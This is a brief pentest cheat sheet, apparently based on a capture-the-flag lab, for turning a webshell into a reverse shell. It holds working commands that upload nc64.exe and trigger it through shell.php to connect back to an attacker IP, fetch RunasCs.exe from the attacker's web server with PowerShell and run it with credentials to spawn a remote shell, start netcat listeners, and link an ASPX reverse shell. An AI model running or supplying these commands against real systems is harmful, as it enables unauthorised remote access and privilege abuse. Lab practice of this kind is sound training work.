Reverse Shell - Pentest Cheat Sheet

From webshell to shell nc64.exe

To go from webshell to shell, I’ll upload nc64.exe to the same folder:

put /opt/netcat/nc64.exe nc64.exe
curl -G school.flight.htb/styles/shell.php --data-urlencode 'cmd=nc64.exe -e cmd.exe 10.10.14.6 443'

rlwrap -cAr nc -lnvp 443

RunasCs

The RunasCs project aims to create a binary like runas.exe but without limitations:

I’ll download the latest release, host it with a Python web server, and upload it to the target machine:

powershell -c wget 10.10.14.6/RunasCs.exe -outfile r.exe
.\r.exe USER PASSWORD -r 10.10.14.6:443 cmd
.\r.exe USER PASSWORD powershell.exe -r 10.10.14.6:443

rlwrap -cAr nc -lnvp 443

ASPX Webshell

https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

On github.